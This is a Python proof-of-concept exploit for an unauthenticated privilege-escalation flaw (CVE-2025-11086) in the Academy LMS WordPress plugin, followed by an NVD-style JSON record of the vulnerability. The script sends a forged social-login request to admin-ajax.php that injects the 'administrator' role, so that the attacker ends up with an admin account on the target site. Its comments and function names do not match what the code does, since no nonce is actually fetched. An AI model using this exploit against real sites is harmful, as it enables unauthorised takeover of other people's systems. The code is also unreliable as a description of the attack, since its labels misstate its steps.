CVE-2025-11086

# CVE-2025-11086 - Academy LMS Privilege Escalation PoC # Vulnerability: Unauthenticated Privilege Escalation via Social Login # Affected: Academy LMS Plugin <= 3.3.7 import requests import re TARGET_URL = "http://target-wordpress-site.com" # Step 1: Initiate Social Login request to get the registration nonce def get_registration_nonce(session, target_url): """Fetch the registration page to obtain nonce/token""" # Access the social login registration endpoint login_url = f"{target_url}/wp-admin/admin-ajax.php" # Step 2: Send crafted registration request with admin role data = { "action": "academy_lms_social_login", "provider": "google", # or facebook, twitter, etc. "email": "[email protected]", "username": "attacker_admin", "role": "administrator", # Malicious role injection "first_name": "Attacker", "last_name": "Admin", } response = session.post(login_url, data=data) return response # Step 3: Exploit the missing role validation def exploit(target_url): session = requests.Session() # Trigger the vulnerable social login registration response = get_registration_nonce(session, target_url) if response.status_code == 200: print(f"[+] Exploit sent to {target_url}") print("[+] Check if new administrator account was created") print("[+] Try logging in with: [email protected] / [social_account_password]") else: print(f"[-] Exploit failed: {response.status_code}") if __name__ == "__main__": exploit(TARGET_URL)

{"cve": {"id": "CVE-2025-11086", "sourceIdentifier": "[email protected]", "published": "2025-10-22T12:15:33.427", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Academy LMS – WordPress LMS Plugin for Complete eLearning Solution plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 3.3.7. This is due to the plugin not properly validating a user's role prior to registering a user via the Social Login addon. This makes it possible for unauthenticated attackers to update their role to Administrator when registering on the site."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://academylms.net/", "source": "[email protected]"}, {"url": "https://academylms.net/whats-new/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0f42f0be-5386-448b-9e65-5d2584cc2175?source=cve", "source": "[email protected]"}]}}